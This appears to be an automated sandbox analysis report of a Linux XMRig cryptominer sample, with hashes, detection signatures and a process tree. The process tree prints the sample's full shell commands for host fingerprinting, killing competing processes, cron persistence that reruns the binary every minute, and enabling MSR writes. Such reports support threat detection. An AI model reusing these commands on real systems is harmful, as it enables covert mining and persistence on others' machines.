Analysis
-
max time kernel
56s -
max time network
25s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
03-07-2024 03:10
Behavioral task
behavioral1
Sample
-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral2
Sample
-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
Resource
ubuntu2204-amd64-20240522.1-en
General
-
Target
-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
-
Size
2.3MB
-
MD5
b9f096559e923787ebb1288c93ce2902
-
SHA1
94851bcc8f9c651bcda0ff33d17356cb0b16cf12
-
SHA256
1fcc2061f767574044ca1e97f92ca1d44ee0b35e0a796e3bd6a949ad4b1175e5
-
SHA512
ce5f09737d0b7191e3b646ed6111bb0ce97544d280223f327c4f4cc652dc840fed639bc0462b88a7f87d071066e302be7980f14faca1f5e6e9bf732637db22be
-
SSDEEP
49152:hjYpLCWvHFiMBiBFjrhrlzr18t7LxcAk4u7prrRQx:MvlNiPt9y7LxXk5prrA
Malware Config
Signatures
-
XMRig Miner payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1402-1-0x00007faf43604000-0x00007faf43cc2d40-memory.dmp xmrig -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
Processes:
-bash-55bb90b9-2429-4214-8c22-5d8ee0859237description ioc process File opened for reading /sys/devices/virtual/dmi/id/bios_vendor -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/sys_vendor -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/product_name -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/board_vendor -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.oCihMu crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
Processes:
-bash-55bb90b9-2429-4214-8c22-5d8ee0859237description ioc process File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/product_serial -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/board_name -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/product_uuid -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/board_serial -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/chassis_type -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/bios_version -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/bios_date -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/board_version -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/chassis_version -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id/product_version -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 -
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
-bash-55bb90b9-2429-4214-8c22-5d8ee0859237grepgrepdescription ioc process File opened for reading /proc/cpuinfo -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep -
Reads CPU attributes 1 TTPs 7 IoCs
Processes:
ps-bash-55bb90b9-2429-4214-8c22-5d8ee0859237pspspsdescription ioc process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/system/cpu/types -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/system/cpu/possible -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Enumerates kernel/hardware configuration 1 TTPs 61 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
-bash-55bb90b9-2429-4214-8c22-5d8ee0859237modprobedescription ioc process File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/virtual/dmi/id -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/firmware/dmi/tables/smbios_entry_point -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/dax/devices/target_node -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/dax/target_node -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/firmware/dmi/tables/DMI -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/module/msr/initstate modprobe File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/node/devices/node0/meminfo -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/node/devices/node0/hugepages -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/dax/devices -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/node/devices/node0/access1/initiators -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/fs/cgroup/unified/cgroup.controllers -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/node/devices/node0/access0/initiators -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/devices/system/node/online -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/kernel/mm/hugepages -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for reading /sys/bus/node/devices/node0/cpumap -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
pspspspsdescription ioc process File opened for reading /proc/13/status ps File opened for reading /proc/645/status ps File opened for reading /proc/565/cmdline ps File opened for reading /proc/93/status ps File opened for reading /proc/994/status ps File opened for reading /proc/976/stat ps File opened for reading /proc/1392/cmdline ps File opened for reading /proc/1356/status ps File opened for reading /proc/1370/cmdline ps File opened for reading /proc/458/stat ps File opened for reading /proc/1048/stat ps File opened for reading /proc/1102/stat ps File opened for reading /proc/24/stat ps File opened for reading /proc/70/cmdline ps File opened for reading /proc/18/cmdline ps File opened for reading /proc/2/status ps File opened for reading /proc/1132/status ps File opened for reading /proc/461/stat ps File opened for reading /proc/1334/cmdline ps File opened for reading /proc/115/stat ps File opened for reading /proc/765/cmdline ps File opened for reading /proc/812/status ps File opened for reading /proc/1130/stat ps File opened for reading /proc/2/stat ps File opened for reading /proc/1344/cmdline ps File opened for reading /proc/88/status ps File opened for reading /proc/1442/cmdline ps File opened for reading /proc/85/status ps File opened for reading /proc/170/status ps File opened for reading /proc/1379/cmdline ps File opened for reading /proc/5/status ps File opened for reading /proc/1453/cmdline ps File opened for reading /proc/1335/cmdline ps File opened for reading /proc/17/stat ps File opened for reading /proc/21/status ps File opened for reading /proc/504/stat ps File opened for reading /proc/1100/status ps File opened for reading /proc/636/cmdline ps File opened for reading /proc/459/stat ps File opened for reading /proc/14/cmdline ps File opened for reading /proc/22/stat ps File opened for reading /proc/687/stat ps File opened for reading /proc/159/status ps File opened for reading /proc/645/cmdline ps File opened for reading /proc/1132/status ps File opened for reading /proc/88/stat ps File opened for reading /proc/1026/status ps File opened for reading /proc/uptime ps File opened for reading /proc/90/stat ps File opened for reading /proc/1337/cmdline ps File opened for reading /proc/1457/stat ps File opened for reading /proc/1082/status ps File opened for reading /proc/20/status ps File opened for reading /proc/885/stat ps File opened for reading /proc/1338/stat ps File opened for reading /proc/1123/stat ps File opened for reading /proc/1083/cmdline ps File opened for reading /proc/1026/stat ps File opened for reading /proc/242/status ps File opened for reading /proc/648/cmdline ps File opened for reading /proc/70/stat ps File opened for reading /proc/176/cmdline ps File opened for reading /proc/1382/status ps File opened for reading /proc/1130/status ps -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes:
-bash-55bb90b9-2429-4214-8c22-5d8ee0859237shdescription ioc process File opened for modification /tmp/.lock -bash-55bb90b9-2429-4214-8c22-5d8ee0859237 File opened for modification /tmp/.cron sh
Processes
-
/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee08592371⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
-
/usr/bin/hostnamehostname -I3⤵
-
/usr/bin/awkawk "{print \$1}"3⤵
-
/usr/bin/catcat /etc/ssh/sshd_config3⤵
-
/usr/bin/grepgrep "Port "3⤵
-
/usr/bin/headhead -n 13⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"3⤵
-
/usr/bin/whoamiwhoami3⤵
-
/usr/bin/hostnamehostname3⤵
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo3⤵
- Checks CPU configuration
-
/usr/bin/cutcut -d: -f23⤵
-
/usr/bin/sedsed -e "s/^ *//"3⤵
-
/usr/bin/sedsed -e "s/\$//"3⤵
-
/usr/bin/awkawk "{print \$1}"3⤵
-
/usr/bin/awkawk "{print \$4}"3⤵
-
/usr/bin/awkawk "{print \$4}"3⤵
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/idid -u3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/grepgrep /etc/cron3⤵
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/shsh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"2⤵
- Writes file to tmp directory
-
/usr/bin/rmrm -rf /tmp/.cron3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/crontabcrontab -l3⤵
-
/usr/bin/grepgrep -v /tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee08592373⤵
-
/usr/bin/grepgrep "/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237\$"3⤵
-
/usr/bin/sortsort3⤵
-
/usr/bin/uniquniq3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/crontabcrontab -l3⤵
-
/usr/bin/wcwc -l3⤵
-
/usr/bin/crontabcrontab /tmp/.cron3⤵
- Creates/modifies Cron job
-
/usr/bin/rmrm -rf /tmp/.cron3⤵
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"3⤵
-
/usr/bin/wcwc -l3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/shsh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"2⤵
-
/sbin/modprobe/sbin/modprobe msr "allow_writes=on"3⤵
- Enumerates kernel/hardware configuration
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/.cronFilesize
63B
MD57d54d1560c6fd7816f8c66f2eaa4bbfb
SHA18b745ad152c42c7e8bb5680a65430e2c432e7125
SHA2566a4889b152f843a609b03a59eecdcd2ba3786fc1ccb6da80f2f0631f1fbc2515
SHA512b3d2aa11dc1def8a68eceed2ff49ab94aa0ae4a44380d50876e2fda4030d79fb0bc5a59adb515466ed5e2d15d3f5d5f063df02bfab414a44be9c94291d34357e
-
/var/spool/cron/crontabs/tmp.oCihMuFilesize
247B
MD53589d2bb6bc055c39c7c8eda7ad09f00
SHA1f9c5877b4caf114de6c9ea296242bad3b80625f0
SHA256f4307f4448290cca325e82ea1895710d04ec7e80926a3ce9aa8c3f6b6eebb459
SHA5129aafe66663b3eb3c8ed1306e65c835974fcb31966b48725853abac07c6ff45435415625877413ca5ed896c87840993016b77430e4f4a7ad8a40d5b4e0e80e8f5
-
memory/1402-1-0x00007faf43604000-0x00007faf43cc2d40-memory.dmp